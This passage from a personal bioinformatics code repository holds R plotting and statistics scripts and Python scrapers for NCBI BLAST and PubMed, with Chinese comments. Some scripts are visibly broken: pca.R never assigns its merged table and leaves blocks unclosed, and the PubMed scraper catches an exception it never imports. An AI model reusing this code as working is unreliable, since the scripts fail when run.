"text": "#Rscript FB_boxplot.R F_B_ratio_boxplot.txt(在主目录的 data 文件夹里) E-liquid:Cigarette 487eb3:d2382c\nlibrary(ggplot2)\nlibrary(ggpubr)\nArgs = commandArgs(TRUE)\nfb_table = Args[1] #F_B_ratio_boxplot.txt\ngroup_list = Args[2] #E-liquid:Cigarette\ncolor_list = Args[3] #487eb3:d2382c 颜色的顺序要和上边的组别一致\n\nlegend_list = unlist(strsplit(group_list, \":\"))\ncolor_var = unlist(strsplit(color_list,\":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = gsub(\":\",\"_\", group_list)\n\ndt = read.table(fb_table, header = T, sep =\"\\t\")\n\n#差异计算\nFB_diff = compare_means(FB~subgroup, data=dt, group.by = \"group\")\nwrite.table(FB_diff,file = paste(filename_prefix,\"_FB_Diffresult.txt\", sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\n\ngroup_list = c('E-liquid', 'Cigarette')\ndt$Subgroup = factor(dt$subgroup, levels=legend_list)\nPlot = ggplot(dt,aes(x = group, y = log10(FB))) +\ngeom_boxplot(aes(color = Subgroup),fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.9)) +\nlabs(x ='', y = expression(F/B~ratio~(log['10'])), fill = '', color = '', size = 10 ) +\nscale_color_manual(values = color_var) + \ntheme(\n axis.text = element_text(colour = 'black', size = 10),\n# axis.text.x = element_text(hjust = 1, angle = 45), #phylum\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n) + stat_compare_means(label = \"p.signif\")\n\n#plot\npostscript(paste(filename_prefix,\"_FB_boxplot.eps\",sep=\"\"), width = 6, height=4)\nPlot\ndev.off()\n#png(paste(filename_prefix,\"_FB_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n#Plot\n#dev.off()\n"
},
{
"alpha_fraction": 0.6877005100250244,
"alphanum_fraction": 0.6983957290649414,
"avg_line_length": 48.21052551269531,
"blob_id": "af06efad628efddecf13cb6719ced2610a215115",
"content_id": "19fe229734306ad279a5faab32cb8cd1d2899f13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 19,
"path": "/adonis.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/R\n#eg: Rscript adonis.R expose_abd.txt Sample_information_detail.txt Group\nlibrary(vegan)\nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt \ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt \nvar = Args[3] # 需要做检验的组别名字 Group 或者 Sex 之类的\n\noutfile = paste(var,\"Adonis.txt\", sep=\"\") \ndt = read.table(abd_table, header=T, row.names=1, sep=\"\\t\", check.names=F)\ngroup <- read.table(group_table, header=T, check.name = F)\nDT <- t(dt)\nDT.mat = sqrt(DT)\nDT.dist <- vegdist(DT.mat, method=\"bray\")\nset.seed(1)\nrun <- paste(\"DT.div = adonis2(formula=DT.dist~\",var,\",data=group,permutations=9999)\",sep=\"\")\neval(parse(text = run)) # 首先使用 parse() 函数将字符串转化为表达式(expression),再使用 eval() 函数对表达式求解\nwrite.table(DT.div, file=outfile, quote = F, sep=\"\\t\", col.names=NA) #保持第一行第一列的空白位置\n#write.table(data.frame(\"Name\"=rownames(DT.div),DT.div,check.names=F), file=outfile, quote = F, sep=\"\\t\", row.names=F) #或者给第一行第一列的位置赋值\n"
},
{
"alpha_fraction": 0.5810219049453735,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 37.05555725097656,
"blob_id": "c38dea6707d180f171adfc5ae127c5f22434d303",
"content_id": "81db80fe6d734400d2583c2d9bd322d2da367436",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 803,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 18,
"path": "/Phenotype/cat_result.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 接上一个差异检验的脚本 cat_diff.R ,处理其结果,整理成发表文章用的格式,略加改动就可以;\n\nimport os\ngroup = ['NS','FS','CS'] # 组名\n\nwith open('diff_results.xls', 'r') as IN, open('Final_result.xls','w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')\n\tprint('\\t'.join([head[0], '\\t'.join(group), head[1]]), file = out)\n\tfor line in IN:\n\t\tline = line.strip('\\n').split('\\t')\n\t\toutline = '\\t'.join([line[0] + ',n(%)', '\\t'*len(group)]) \n\t\tprint(outline + '%.2e' % float(line[1]), file = out) #格式化输出,科学计数法,保留两位小数点... \n\t\twith open(line[0] + '_information.xls', 'r') as indice:\n\t\t\tindice.readline()\n\t\t\tfor line in indice:\n\t\t\t\tline = line.strip('\\n')\n\t\t\t\tprint(line, file = out)\n\t#\tos.remove(line[0] + '_information.xls')\n"
},
{
"alpha_fraction": 0.6294389963150024,
"alphanum_fraction": 0.6407617330551147,
"avg_line_length": 36.36538314819336,
"blob_id": "2b5991b1fb0f82727ab5559de389df842cd0f8b6",
"content_id": "ba67334395941dcdeed70a2621226af6b06395d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2019,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 52,
"path": "/爬虫/blast_crawler.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys #这个没有用上\nimport time,os,re\nbrowser = webdriver.Chrome()\nurl = 'https://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastn&PAGE_TYPE=BlastSearch&LINK_LOC=blasthome'\nbrowser.get(url)\notu_seq = 'filter_OTU_final.fasta' # 输入文件\nseq = ''\n#otu_num = 0\nwith open(otu_seq, 'r') as IN:\n for line in IN:\n seq = seq + line\n# otu_num += 1\nbrowser.find_element_by_id(\"seq\").send_keys(seq)\ntime.sleep(60) # 视网速而定...\nprint(\"sequence input done~\")\nbrowser.find_element_by_xpath('//*[@class=\"blastbutton\"]').click()\ntime.sleep(180) # 视网速而定...\nprint('blast done!')\nout = open('align_result.xls', 'w')\nselect = Select(browser.find_element_by_id('queryList'))\nnumber = len(select.options)\nfor index in range(0, number):\n select = Select(browser.find_element_by_id('queryList'))\n otu_id = select.options[index].text\n print(otu_id)\n print('##' + otu_id, file = out)\n select.select_by_index(index)\n time.sleep(5)\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n table = soup.find(class_ = \"ui-ncbigrid-outer-div caption-exists\")\n raw_head = table.find(class_ = \"first\").get_text()\n raw_head = re.sub('\\n+','\\n', raw_head)\n header = '\\t'.join(raw_head.strip('\\n').split('\\n')[1:]) ##\n print(header, file = out)\n for results_number in range(1,11):\n raw_line = table.find(ind = results_number).get_text()\n raw_line = re.sub('\\n+','\\n', raw_line)\n # E value 和 identity 列错位\n temp = raw_line.strip('\\n').split('\\n')\n mismatch = temp[5]\n del temp[5]\n del temp[0]\n temp.insert(5,mismatch[:-6])\n temp.insert(6,mismatch[-6:])\n line = '\\t'.join(temp)\n print(line, file = out)\nout.close() ## 一定要关闭... 不然输出文件会不全....\n"
},
{
"alpha_fraction": 0.6111927032470703,
"alphanum_fraction": 0.6479033827781677,
"avg_line_length": 49.23770523071289,
"blob_id": "639f889b890b7ff0d34b47fc35a8188175dce4d2",
"content_id": "7325a467fcfb9398efaf3ff77bf5404632d7ae86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6245,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 122,
"path": "/pca.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript \n#eg: Rscript pca.R expose_abd.txt Sample_information_detail.txt CK:E-liquid:Cigarette 67ab57:487eb3:d2382c \nArgs <- commandArgs(TRUE)\nabd_table = Args[1] # 丰度文件 expose_abd.txt\ngroup_table = Args[2] # 分组文件 Sample_information_detail.txt\ngroup_list = Args[3] # CK:E-liquid:Cigarette\ncolor_list = Args[4] # 67ab57:487eb3:d2382c\ndt = read.table(abd_table, header = T,sep = '\\t', row.names = 1, check.names = F, comment.char=\"\")\ngroup = read.table(group_table, header=T, sep=\"\\t\", row.names = 1, check.names = F,comment.char=\"\") \ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ade4)\nlibrary(ggplot2)\n#dt_t = t(dt)\ndt_t = t(sqrt(dt)) # 原始数据预处理\ndt.dudi <- dudi.pca(dt_t,center=TRUE,scale=F,scannf=F,nf=4)\n#pca = cbind(dt.dudi$li,group)\nmerge(dt.dudi$li,group,by=\"row.names\") #原来的合并方式太危险啦\npca$Group = factor(pca$Group, levels=legend_list)\npc1 = round(100*dt.dudi$eig[1]/sum(dt.dudi$eig),2)\npc2 = round(100*dt.dudi$eig[2]/sum(dt.dudi$eig),2)\nxlab=paste(\"PC1(\",pc1,\"%)\",sep=\"\")\nylab=paste(\"PC2(\",pc2,\"%)\",sep=\"\")\npc = ggplot(pca,aes(x=Axis1,y=Axis2,col=Group,shape = Group)) + \n geom_point(size = 3) + \n theme_bw() + \n scale_color_manual(values = color_var) + \n labs(x=xlab,y=ylab) + \n theme(axis.text = element_text(colour = 'black', size = 10), axis.title = element_text(size = 12), \n panel.background = element_rect(colour = \"black\", size = 1),panel.grid =element_blank(), legend.key = element_blank(), \n legend.text = element_text(size = 10), legend.title = element_blank(), legend.position='none', plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n\n## PC1 & PC2 箱线图\nlibrary(ggpubr)\npc1_diff = compare_means(Axis1 ~ Group, pca, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(pc1_diff,file = paste(filename_prefix,\"_pc1_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pc1_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 增加所有差异检验不显著结果的处理\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npc1 = ggplot(pca,aes(x=Group, y=Axis1,colour=Group)) + geom_boxplot()+stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(pca$Axis1)) + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC1\") + scale_y_continuous(limits = c(min(pca$Axis1), max(pca$Axis1) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n} else {\npc1 = ggplot(pca,aes(x=Group, y=Axis1,colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC1\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.4,0.3, 0, 0), 'in'))\n \npc2_diff = compare_means(Axis2 ~ Group, pca, method = \"wilcox.test\") \nwrite.table(pc2_diff,file = paste(filename_prefix,\"_pc2_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(pc2_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) { # 同上\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\npc2 = ggplot(pca,aes(x=Group, y=Axis2,colour=Group)) + geom_boxplot()+ stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(pca$Axis2)) + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC2\") + scale_y_continuous(limits = c(min(pca$Axis2), max(pca$Axis2) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n} else {\npc2 = ggplot(pca,aes(x=Group, y=Axis2,colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) +\n labs(x=\"\", y = \"PC2\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0, 0.3, 0.1, 0), 'in'))\n#output\npdf(paste(filename_prefix,\"_PCA.pdf\",sep=\"\"),width=6,height=4)\npng(paste(filename_prefix,\"_PCA.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") # 增加 png 的输出, 方便做 PPT。。。\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=2,ncol=3)\nvp1 <- viewport(layout.pos.col=c(1,2),layout.pos.row=c(1,2))\nvp2 <- viewport(layout.pos.col=3,layout.pos.row=1)\nvp3 <- viewport(layout.pos.col=3,layout.pos.row=2)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\npar(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\nprint(pc,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(pc1,newpage=FALSE)\npopViewport()\n\npushViewport(vp3)\npar(new=TRUE,fig=gridFIG())\nprint(pc2,newpage=FALSE)\npopViewport()\ndev.off()\n"
},
{
"alpha_fraction": 0.7550504803657532,
"alphanum_fraction": 0.7601010203361511,
"avg_line_length": 55.57143020629883,
"blob_id": "9682281a1e3fa76e6a9f774ded3924308bae56d7",
"content_id": "f87a8870355edc0f3c01ce430865c4f8459dcc7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 7,
"path": "/heatmap.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 根据计算出来的 braycurtis 距离矩阵,画热图,并且进行按照分组进行标识\n\nlibrary('pheatmap')\ndt = read.table('braycurtis.txt', header=T)\nexpose = read.table('expose_diversity', header=T, check.names=FALSE)\nexpose_group = read.table('Sample_information_detail.txt', header=T, row.names=1, comment.char='', check.names=F) #分组信息,行名需是距离矩阵的列名 \npheatmap(expose, fontsize=9,annotation_col=expose_group, filename='expose_bray.pdf')\n"
},
{
"alpha_fraction": 0.6179159283638,
"alphanum_fraction": 0.619744062423706,
"avg_line_length": 38.07143020629883,
"blob_id": "096a0e357b65b9772ad903952f0e0e8a947f9875",
"content_id": "ef0e3c5dca985c7c87dc95b9434dfee8f610f3d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 14,
"path": "/braycurtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance\nimport pandas as pd\ndt = pd.read_table('GeneCatalog_profile.xls')\n#dt.index = dt['geneID']\n#dt.drop(['geneID'], axis=1, inplace=True) 忘记了为啥加上这两行....\nwith open('braycurtis.txt', 'w') as bray:\n print('\\t' + '\\t'.join(dt.columns.values), file = bray)\n for first in dt.columns.values:\n lst = list()\n lst.append(first)\n for second in dt.columns.values:\n dis = distance.braycurtis(dt[first], dt[second])\n lst.append(str(dis))\n print('\\t'.join(lst), file=bray)\n"
},
{
"alpha_fraction": 0.5992210507392883,
"alphanum_fraction": 0.6099318265914917,
"avg_line_length": 34.41379165649414,
"blob_id": "6fac4ecfb3d3a2ebf436bf8a782c7dfd62bb4fa2",
"content_id": "df2f8a81d2635671bebc8656bbfa7e8a23cbe687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5355,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 145,
"path": "/Paper_information/advanced_paper_informational.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys \nimport time,os,re\n\n# set pars\nimport argparse,re,os,math,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCrawl the information of paper... You should provide the DOI or a file for DOI (line breaks). \nExample: python3 advanced_paper_informational.py -l 10.1016/S0140-6736(19)32319-0\n python3 advanced_paper_informational.py -f doi_file\nTo be continued.\n------------------'''\n)\nparser.add_argument('-l','--onedoi', nargs='?', help = \"DOI information.\")\nparser.add_argument('-f','--filelist',nargs='?', help = \"the DOI information list file.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\nvar = args.onedoi\nfiles = args.filelist \n\n## define the user(linux) and abbreviatio for print \nimport re\nDict = {'zhangSan':'ZS', 'LiSi':'LS'}\nimport os\nuser_full = os.popen('whoami').readlines()[0].strip()\nif user_full in Dict:\n user = Dict[user_full]\nelse:\n user = user_full\n\n# doi information \ndoi_list = list()\nif var:\n\tdoi_list.append('DOI: ' + var)\nif files:\n\twith open(files, 'r') as IN:\n\t\tInput = IN.readlines()\n\t\tdoi_list = ['DOI: ' + x.strip() for x in Input]\t\n\n# out file \nout = open('paper_information.xls', 'w')\n\n## scraping \nprint(user_full + ' is crawling... \\nThe warning information appeared later does not matter. \\nIt may need some time, please wait patiently:)\\nIf there is no output for a long long time, you should stop it and try to run again.\\n')\n\nbrowser = webdriver.PhantomJS() \nurl = 'https://pubmed.ncbi.nlm.nih.gov/'\n \n# 杂志名称全称\nj_name = dict()\nwith open('files/J_Medline.txt', 'r') as IN:\n for line in IN:\n line = line.strip('\\n')\n if line.startswith('JournalTitle'):\n if re.search(' \\(.*\\)', line):\n match = re.search('JournalTitle: (.*) \\(.*\\)', line) \n else:\n match = re.search('JournalTitle: (.*)', line) # ncbi 是缩写,然后影响因子是全称,所以得找到这个信息\n #发现有带(London, England)这种信息的。。。。\n full = match.group(1)\n if line.startswith('MedAbbr'):\n match = re.search('MedAbbr: (.*)', line)\n abbr = match.group(1)\n if line.startswith('NlmId'):\n j_name[abbr] = full\n \n# 杂志 IF\nimport pandas as pd\ndt = pd.read_table('files/IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\n\nfor x in doi_list:\n DOI = x\n browser.get(url)\n print(\"\\nThe pubmed url is opening correctly.\\n\")\n time.sleep(3)\n try:\n browser.find_element_by_xpath('//*[@name=\"term\"]').send_keys(x)\n time.sleep(2)\n except NoSuchElementException:\n print('AO, something wrong...')\n\n browser.find_element_by_xpath('//*[@class=\"search-btn\"]').click()\n time.sleep(2)\n print(\"\\nThe page for paper \" + x + \" is opiening correctly.\\n\")\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n \n # journal name abbr\n journal = soup.find(id = \"full-view-journal-trigger\").get_text().strip()\n\n # title\n title = soup.find(class_ = \"heading-title\").get_text().strip()\n \n # IF\n for x in IF_dict:\n match = re.search('^' + j_name[journal] + '$', x, flags=re.IGNORECASE) # 有的名字包含其他杂志的全称... \n if match:\n IF = IF_dict[x]\n journal_name = j_name[journal]\n else:\n match = re.search('^' + j_name[journal].replace('.','') + '$', x, flags=re.IGNORECASE) # 有的杂志匹配出来的全称多了个点:Nature reviews. Immunology\n if match:\n journal_name = j_name[journal].replace('.','')\n IF = IF_dict[x]\n\n\n # 发表时间\n if soup.find(class_ = \"secondary-date\"):\n p_time = soup.find(class_ = \"secondary-date\").get_text().strip().strip('Epub ').strip('.')\n else:\n p_time = soup.find(class_ = \"cit\").get_text().split(\";\")[0]\n\n # PMID \n PMID = soup.find(class_ = \"current-id\").get_text()\n\n\n #原文链接\n doi_info = soup.find(class_ = \"identifier doi\") \n http = doi_info.find(class_ = \"id-link\")['href'] # 增加这一步是因为偶尔会出现 NCBI 的链接\n\n # 一作和通讯\n authors = soup.find(class_ = \"authors-list\").get_text().strip().replace(u'\\xa0', '').replace(u'\\xa0', '').replace(' ', '')\n author_list = re.sub('\\n\\w*', '', authors).split(',')\n first_author = author_list[0]\n corresponding_author = author_list[-1]\n\n # 第一单位\n affiliations = soup.find(class_ = \"affiliations\").get_text().strip()\n affiliations = re.sub('[ ]+', ' ', affiliations)\n affiliations_list = re.sub('[\\n]{2,}', '', affiliations).split('\\n')\n first_affiliation = affiliations_list[1].lstrip(' 0123456789')\n\n line = '\\t'.join([user, title, journal_name, p_time.replace('.', ''), PMID, DOI, http, IF, first_author, corresponding_author, first_affiliation])\n print(line, file = out)\n print('\\n' + line + '\\n')\n \nout.close()\nprint(\"\\nDone!, the output is paper_information.xls.\\n\")\n"
},
{
"alpha_fraction": 0.6222509741783142,
"alphanum_fraction": 0.6261319518089294,
"avg_line_length": 19.891891479492188,
"blob_id": "1223eac6c196a34a693599e572a619e5af5196c8",
"content_id": "2121d94f602acdb5b91c4145ecba3e2d6d4d62bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 37,
"path": "/fasta_split.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#按照 fasta 的 ID 和序列切分 fasta 文件,按 ID 输出想要的 fasta 序列(注释掉)\n#! /usr/bin/python3\nimport os,sys\n## write the fasta file into directory\n#otu_ID = sys.argv[1]\ninputFile = sys.argv[1] # fasta 文件\nbasename = os.path.basename(inputFile)\noutFile = 'filter_' + basename\nfasta_dict = dict()\nwith open (inputFile, 'r') as IN:\n\tseq = ''\n\tkey = ''\n\tfor line in IN:\n\t\tif line.startswith('>'):\n\t\t\tfasta_dict[key] = seq\n\t\t\tkey = line\n\t\t\tseq = ''\n\t\telse:\n\t\t\tseq = seq + line\n\n\tfasta_dict[key] = seq\n\ndel fasta_dict['']\n\n##按照键值对输出 fasta 的序列,可以自己拿个小文件测试\nfor key in fasta_dict:\n\tprint (key + '==>' + fasta_dict[key]) \n\n'''\n#process otu ID file\nwith open(otu_ID, 'r') as IN, open(outFile, 'w') as out:\n\tfor line in IN:\n\t\tID = '>' + line\n\t\tif ID in fasta_dict:\n\t\t\tout.write(ID + fasta_dict[ID])\n\n'''\n"
},
{
"alpha_fraction": 0.5530410408973694,
"alphanum_fraction": 0.6760962009429932,
"avg_line_length": 53.153846740722656,
"blob_id": "0d83ae97632351304090cbc1276685b6ae9d22cb",
"content_id": "bccd9918bde2909360d721ffb28ad40ce202b6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 953,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 13,
"path": "/permutation.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 置换检验的一个例子,来自参考链接\na<-c(24,43,58,67,61,44,67,49,59,52,62,50,42,43,65,26,33,41,19,54,42,20,17,60,37,42,55,28) #生成 28 个数据\ngroup<-factor(c(rep(\"A\",12),rep(\"B\",16))) # A,B 分别重复 12,16 次 \ndata<-data.frame(group,a) #合并成数据框\nfind.mean<-function(x){ #计算 A,B 标签对应数据的均值差\nmean(x[group==\"A\",2])-mean(x[group==\"B\",2]) \n}\nmean_obs = find.mean(data) #计算实际数据的均值差\nresults<-replicate(999,find.mean(data.frame(group,sample(data[,2])))) #随机打乱 28 个数据,赋予标签 A,B,计算对应的均值差,重复 999 次\np.value<-length(results[results>mean(data[group==\"A\",2])-mean(data[group==\"B\",2])])/1000 #统计大于实际均值差的均值比例;\nhist(results,breaks=20,prob=TRUE) #画图\nlines(density(results)) #加拟合线\npoints(mean_obs, p.value, pch=16) # 画出实际均值差为横坐标,对应 P 值为纵坐标的实心点\n \n"
},
{
"alpha_fraction": 0.6057401895523071,
"alphanum_fraction": 0.6193353533744812,
"avg_line_length": 26.58333396911621,
"blob_id": "b6b1309c276071d579b704cca47878cdd47a82fe",
"content_id": "86f15b0e3f3a5b8a7b7c96e0dbf3a1a790f6ad74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 24,
"path": "/Maaslin/maaslin_run.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(getopt)\nspec <- matrix(c(\n 'help','h',0,'logical','',\n 'input','i',1,'character','the tsv file',\n 'config','c',1,'character','the config file',\n 'outdir','o',2,'character','output dir'\n),ncol=5,byrow=TRUE)\nopt <- getopt(spec)\nif( !is.null(opt$help)) {\n cat(getopt(spec, usage=TRUE));\n q(status=1);\n}\n\nif ( is.null(opt$input) | is.null(opt$config)) {\n\tprint('Please!') #翻译过来是求您了!\n\tcat(getopt(spec, usage=TRUE));\n\tq(status=1);\n}\n\ninput = opt$input\nconfig = opt$config\nif( is.null(opt$outdir) ) { outdir <- './'} else { outdir <- opt$outdir }\nlibrary(Maaslin)\nMaaslin(input, outdir, strInputConfig=config ,dMinAbd=0,dMinSamp = 0)\n"
},
{
"alpha_fraction": 0.5169141888618469,
"alphanum_fraction": 0.5878713130950928,
"avg_line_length": 82.55172729492188,
"blob_id": "5bae4d2523380e9cc9ce77993c55d1c7663ac119",
"content_id": "8b109878d18377bb866bddfc8f1f1c1f41cda35c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2446,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 29,
"path": "/CHD/heatmap.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# zscore 热图\n\n## 门\nlibrary(pheatmap)\ndt = read.table(\"zscore_phylum.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 20, cellwidth = 20, filename = 'phylum_zscore.pdf', width = 10, height = 8)\n\n\n#种\nlibrary(pheatmap)\ndt = read.table(\"zscore_species.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('species_annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 8, cellwidth = 8, filename = 'species_zscore.pdf', width = 10, height = 8)\n\n#指定五个物种的 zscore\n\ndt = read.table(\"zscore_five_species.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('five_species_annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n 